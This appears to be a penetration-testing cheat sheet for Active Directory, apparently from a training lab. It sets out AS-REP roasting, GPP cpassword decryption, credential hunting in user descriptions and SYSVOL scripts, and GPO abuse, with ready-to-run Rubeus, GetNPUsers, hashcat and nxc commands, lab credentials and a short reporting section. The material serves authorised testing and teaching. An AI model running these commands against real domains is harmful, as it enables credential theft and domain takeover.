π‘οΈ Methodology Checklist
- Check for Exchange Windows Permissions group members (WriteDACL on domain)
- Check for PrivExchange vulnerability (Exchange HTTP auth to LDAP relay)
- Enumerate printer spooler service on DCs:
ls \\[DC]\print$ - Check for weak GPO permissions:
Get-GPO -All | Get-GPPermissions - Look for AS-REP roastable users:
Get-DomainUser -PreauthNotRequired - Enumerate ms-DS-MachineAccountQuota: if >0, non-priv users can add machine accounts
- Check Shadow Credentials:
Get-DomainObject -Identity [USER] | select msds-keycredentiallink
π― Operational Context
Use when: Standard AD attack paths exhausted β check for Exchange Windows Permissions, AS-REP Roasting, PASSWD_NOTREQD accounts, and shadow credentials.
Think Dumber First: AS-REP Roasting requires no creds at all β impacket-GetNPUsers [DOMAIN]/ -usersfile users.txt -format hashcat against every user. Any account with DONT_REQUIRE_PREAUTH set returns a crackable hash.
Skip when: All standard paths (Kerberoasting, ACL abuse, spraying) are still available β exhaust targeted attacks before hunting misc misconfigs.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
adidnsdump -u [DOMAIN]\[USER] ldap://[DC_IP] -r | Enumerate all AD DNS records including hidden hosts (use -r to resolve unknown records) |
Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null} | Hunt for passwords in user Description fields |
ls \\[DC]\SYSVOL\[DOMAIN]\scripts | List SYSVOL scripts directory |
gpp-decrypt [CPASSWORD] | Decrypt GPP cpassword (MS released the AES key) |
nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_autologon | CME β extract GPP autologon credentials |
nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_password | CME β extract GPP password entries |
Get-DomainUser -PreauthNotRequired | select samaccountname,useraccountcontrol | Find ASREPRoastable users (DONT_REQ_PREAUTH flag) |
.\Rubeus.exe asreproast /user:[USER] /nowrap /format:hashcat | Request AS-REP for a specific user |
GetNPUsers.py [DOMAIN]/ -dc-ip [DC_IP] -no-pass -usersfile users.txt | Linux ASREPRoasting β request AS-REPs for users without pre-auth |
hashcat -m 18200 asrep_hash.txt /usr/share/wordlists/rockyou.txt | Crack AS-REP hash (mode 18200, not 13100) |
Import-Module .\SecurityAssessment.ps1 | Load SecurityAssessment module for spooler checks |
Get-SpoolStatus -ComputerName [DC_FQDN] | Check if Print Spooler is running on a DC |
$sid=Convert-NameToSid "Domain Users" | Get SID of Domain Users group |
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid} | Find GPOs that Domain Users can write to |
Get-GPO -Guid [GPO_GUID] | Get GPO name from GUID |
π¬ Deep Dive & Workflow
Attack Selection by Context
| Finding | Attack | Hashcat Mode |
|---|---|---|
| User with Description containing password | Direct cred use | β |
GPP XML in SYSVOL with cpassword | gpp-decrypt | β |
| User with DONT_REQ_PREAUTH | ASREPRoasting | 18200 |
| DC with Print Spooler running | PrintNightmare / Printer Bug coercion | β |
| Domain Users with GPO write rights | GPO abuse | β |
DNS Enumeration for Hidden Hosts
Standard scans miss hosts that donβt respond to ICMP. AD DNS knows every machine:
adidnsdump -u INLANEFREIGHT\forend ldap://172.16.5.5 -r
# -r: resolve unknown records β without it you miss many entries
# Output: records.csv with all A records including unconventional hosts (Jenkins, Logistic servers, etc.)Credential Hunting in Description Fields
Helpdesk sometimes stores passwords in user objects:
Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}
# Also check Notes, Info attributesAlso check SYSVOL scripts β administrators often hardcode credentials in logon scripts:
ls \\ACADEMY-EA-DC01\SYSVOL\INLANEFREIGHT.LOCAL\scripts
# Read any .bat, .ps1, .vbs files foundGPP Password Decryption (MS14-025)
Microsoft published the AES key used to encrypt cpassword in Group Policy Preferences (GPP) XML files. These persist in SYSVOL long after patching:
# Automated via CME
nxc smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologon
nxc smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_password
# Manual decrypt
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ7gWgiVsZ+s+fVe20GWzc=ASREPRoasting
Accounts with DONT_REQ_PREAUTH set allow anyone to request an AS-REP encrypted with their password β no credentials required. Unlike Kerberoasting (TGS = mode 13100), AS-REP uses mode 18200:
# Find targets
Get-DomainUser -PreauthNotRequired | select samaccountname,useraccountcontrol
# Request tickets (Windows)
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat
# Request tickets (Linux β no creds needed)
GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_users.txthashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txtAlso check PASSWD_NOTREQD (UAC bit 32) β if set, try a blank password immediately.
GPO Abuse
If your compromised account (or Domain Users) has write access to a GPO, it can push malicious configurations to all computers/users in the linked OU:
$sid = Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
Get-GPO -Guid [GPO_GUID] # translate GUID to nameCaution: Check how many computers the GPO applies to before using SharpGPOAbuse. A domain-wide GPO = maximum noise.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| AS-REP roasting returns no hashes | No accounts with preauth disabled | Check with creds: GetNPUsers [DOMAIN]/[USER]:[PASS] -request to enumerate specifically |
| PASSWD_NOTREQD accounts wonβt authenticate | Account may still require password | Test explicitly: nxc smb [TARGET] -u [USER] -p '' β blank password attempt |
| Exchange Windows Permissions abuse fails | Exchange not installed | Verify: Get-ADGroupMember 'Exchange Windows Permissions' β empty = no Exchange |
| Shadow credentials attack fails | PKINIT not configured | Requires AD CS with PKINIT; check: certutil -config - -ping from domain host |
| AdminSDHolder abuse propagation slow | SDProp runs hourly | Wait up to 60 minutes for SDProp to propagate ACL from AdminSDHolder to protected objects |
π Reporting Trigger
Finding Title: AS-REP Roasting Yields Crackable Hashes for Accounts Without Preauth Impact: Accounts with Kerberos pre-authentication disabled return TGT hashes without requiring any authentication, enabling offline password cracking without generating authentication failure logs on the domain controller. Root Cause: Kerberos pre-authentication disabled on user accounts (legacy application requirement or misconfiguration). No monitoring on AS-REP requests from unknown sources. Recommendation: Enable Kerberos pre-authentication on all user accounts. Alert on AS-REP responses for accounts with pre-auth disabled. Audit UAC flags for DONT_REQUIRE_PREAUTH. Implement fine-grained password policies for accounts requiring pre-auth exemption.